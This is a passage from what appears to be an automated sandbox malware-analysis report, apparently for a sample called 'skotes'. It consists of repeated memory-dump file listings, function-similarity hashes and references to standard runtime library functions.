                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1635606685-0
                                                                                                                                                                                                                                              • Opcode ID: 288f24af27634b03992b58851ef01343154069f21bbfcaa0cff479f2704173c7
                                                                                                                                                                                                                                              • Instruction ID: 36a19794b7c7d71300eacabdb336e716ce7d18c03364436f8ab7500cb8ee7257
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 288f24af27634b03992b58851ef01343154069f21bbfcaa0cff479f2704173c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E81C272D002499BEF209F658881EEF7BB99F0B314F194159E860B7281D735CE81FBA0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                                                                                              • Opcode ID: b95841660aa49b114168b222fe6e3ec833048326edbfc706df9efbc93981e874
                                                                                                                                                                                                                                              • Instruction ID: 14e9efced672637d69f80a36ac8d5944efc5357d1f6bf7845f608585e9dd8a11
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b95841660aa49b114168b222fe6e3ec833048326edbfc706df9efbc93981e874
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8051DF72A01A06AFEB298F55D885BBF77B9EF14300F144529E811876D1E731EE40DF90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1707706676-0
                                                                                                                                                                                                                                              • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                              • Instruction ID: b12d29b0b91a2693815b91e81f5ea34293d712c60187d7dd2896872263ddf3ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 205189B5A043099FDF19CF69C4806AFBBF5EF15354F14449AEA60A7391D332AA05CB50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00BFDB64
                                                                                                                                                                                                                                                • Part of subcall function 00BF8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00BF8F50
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00BFDBC3
                                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00BFDBE9
                                                                                                                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 00BFDC56
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1091748018-0
                                                                                                                                                                                                                                              • Opcode ID: 332938e755f3251a2281d7ba4726afc039dbdbe6310d92ad45ee788a96b3a682
                                                                                                                                                                                                                                              • Instruction ID: 35ff26d6b14144594a0ab0c50f1309e8f079f5fa5417d28b17c92c81f5e3507d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 332938e755f3251a2281d7ba4726afc039dbdbe6310d92ad45ee788a96b3a682
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A41D470604218ABCF19AB24C896BBDBBF6EF45710F1440DDE6069B3C2CBB4AD49C791
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00BF56F2
                                                                                                                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00BF5726
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00BF578B
                                                                                                                                                                                                                                              • SafeRWList.LIBCONCRT ref: 00BF579A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
